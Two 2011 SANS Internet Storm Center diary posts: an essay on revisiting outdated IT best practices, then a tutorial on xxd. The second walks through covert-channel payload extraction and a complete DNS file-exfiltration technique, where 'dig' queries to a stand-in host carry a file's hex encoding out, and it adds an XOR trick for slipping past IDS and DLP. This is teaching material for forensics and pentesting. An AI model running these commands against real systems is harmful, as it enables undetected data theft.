Reviewing our preconceptions

Published: 2011-01-25
Last Updated: 2011-01-25 14:01:20 UTC
by Chris Mohan (Version: 1)
6 comment(s)

One of the challenges faced in the IT industry is breaking poorly conceived or mistaken preconceptions held by others. But what happens when we're the ones holding on to outdated ideas, or are simply wrong, because technology has taken another huge leap forward and left us clutching something that's now ineffective?

I have been reviewing some documentation I wrote three years ago, and at a glance it appeared to be valid, based on correct assumptions and needing only minor tweaks to bring it up to date.

John, an ISC reader, emailed in a great comment from a best-practice discussion he had been involved in, reinforcing this. Smart people in that room brought out timeless best practice statements such as:
'Logs should be stored separately from the application to prevent out-of-control logs from filling up the system and causing other components to crash.'

All of which makes perfect sense from a best practice point of view, and I follow this principle on many of the systems I install and manage. Let's test whether this best practice statement is still valid by asking some simple questions:

  • Why are we creating logs in the first place?
  • Who looks at them?
  • Do the right people have access to the logs?
  • Are they of any use?
  • Is there any need to archive them or can they be deleted after x amount of time?
  • Are we asking the right people about the logs in the first place?

It may turn out that keeping 300 GB of logs on their own fast RAIDed disks, backed up nightly, is a huge waste of time, money and resources, as no one ever looks at them, uses them or knows what to do with them. Keeping only a week's worth of logs, taking up 10 MB of disk and used only for occasional troubleshooting, might be the best solution.

So, going back to my documentation, I took a hard look at what I'd written. Almost immediately I found I'd fallen into the generic best-practice assumptions pit. They were good at the time, but not now, given how the business, processes and technology had changed. Needless to say, the quick document update stretched into a number of hours of rewrites, and only after talking to various people about a string of questions I needed to address. Once the documents had been peer reviewed, signed off and finally uploaded, I added an entry to my diary to review and, if necessary, amend them again six months from now.

Do you apply a review process to security policies, procedures, documents and best practices to ensure they still meet the measures and metrics that keep them relevant, meaningful and fit for current business needs?

How can you ensure that you're not clinging to best practices or policies that are well past their sell-by date?

Can you share any pearls of wisdom to help others avoid automatic adoptions of reasonable sounding, yet poorly thought out, best practices?

 

Chris Mohan --- ISC Handler on Duty


Packet Tricks with xxd

Published: 2011-01-25
Last Updated: 2011-01-25 13:35:30 UTC
by Johannes Ullrich (Version: 1)
3 comment(s)

I just finished teaching FOR558, our relatively new network forensics class. Great students and some great side discussions. One of these side discussions involved 'xxd', a tool that can be used to create a hex dump from a binary file, or to reverse a hex dump back into a binary file. For example:

xxd index.html | head -1
0000000: 3c21 444f 4354 5950 4520 6874 6d6c 200a  <!DOCTYPE html .
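
The reverse direction is just as simple; a quick round-trip check (the file names are only examples):

xxd index.html > index.hex       # binary -> hex dump
xxd -r index.hex > index.copy    # hex dump -> binary
cmp index.html index.copy        # no output means the round trip was lossless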

The tool is even flexible enough to be used in vi (try: vi -b with %!xxd, then %!xxd -r to "undo" it before saving).
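
As a quick recipe (the file name is just an example):

vi -b sample.bin      # -b opens the file in binary mode
:%!xxd                # filter the buffer through xxd to edit it as hex
:%!xxd -r             # filter it back to binary before saving with :w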

The tool is very handy; here are two uses that came up in class:

1. Stripping headers and extracting data from a covert channel.

One method to establish a covert channel is to take the original packet and wrap it in an encapsulating header, for example an ICMP or a DNS packet. The trick is to extract the payload, save it to a new file, and treat it as a new packet capture. The 'packetstan' blog [1] outlines one way to do so via scapy. But scapy is not as commonly installed and available as other tools, for example tshark (and, well, xxd).

tshark can easily be used to extract the payload in hexadecimal format (reading here from a capture file; 'covert.pcap' is just a placeholder name):

tshark -r covert.pcap -T fields -e data

To convert the hexadecimal payload into a binary file, just run it through xxd (the output file name is again only a placeholder):

tshark -r covert.pcap -T fields -e data | xxd -r -p > payload.bin

The "-p" option will just accept a stream of hexadecimal data, without it, xxd expects it to be encoded in the very specific format usually see with xxd.

2. File transfer via DNS

Another nice idea I demoed in class is a file transfer via DNS that works without special tools. For pentesters this is helpful: first of all, it will sneak past many firewalls; secondly, you do not need to install any special tools that might be picked up by anti-malware software.

This idea is along the lines of what is discussed in Kevin Bong's SANS Master's project [2].

First, we convert the file to be transferred (named 'secret' here) into a hex stream via xxd:

xxd -p secret > file.hex

Next, we read each line from file.hex and "transmit" it as a DNS query. Each line of plain-style xxd output is 60 hex characters, which conveniently fits within the 63-character limit for a single DNS label:

for b in `cat file.hex`; do dig $b.shell.evilexample.com; done

This does not require special privileges. On the DNS server, we can capture the queries via tcpdump or the query log:

tcpdump -w /tmp/dns -s0 port 53 and host system.example.com

Then, we extract the messages from the packet capture:

tcpdump -r /tmp/dns -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt

The "uniq" may not be necessary, but I find that the DNS messages may be resend once in a while if the response isn't fast enough.

Finally, just reverse the hex encoding:

xxd -r -p < received.txt > secret.out

And you are done: FTDNS (File Transfer via DNS), without installing any special tools on "system.example.com".
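
For a lab run, a quick hash comparison across the two ends confirms the file survived the trip intact (file names as used above):

md5sum secret        # on the sending host
md5sum secret.out    # on the DNS server; the two hashes should match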

Bonus: shorter lines from xxd and maybe a quick XOR may make it even harder for an IDS/data leakage prevention system to "see" this kind of data.
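
As a rough sketch of that idea, assuming an arbitrary single-byte XOR key of 0x42, and using perl on the sending host purely because it tends to be installed already:

# XOR every byte, then emit 16 bytes (32 hex chars) per line instead of the default 30
perl -0777 -pe '$_ ^= "\x42" x length $_' secret | xxd -p -c 16 > file.hex

On the receiving side, decode first, then XOR with the same key:

xxd -r -p < received.txt | perl -0777 -pe '$_ ^= "\x42" x length $_' > secret.out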

Defense: Watch your DNS logs!

[1] http://www.packetstan.com/2010/11/packet-payloads-encryption-and-bacon.html
[2] http://sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

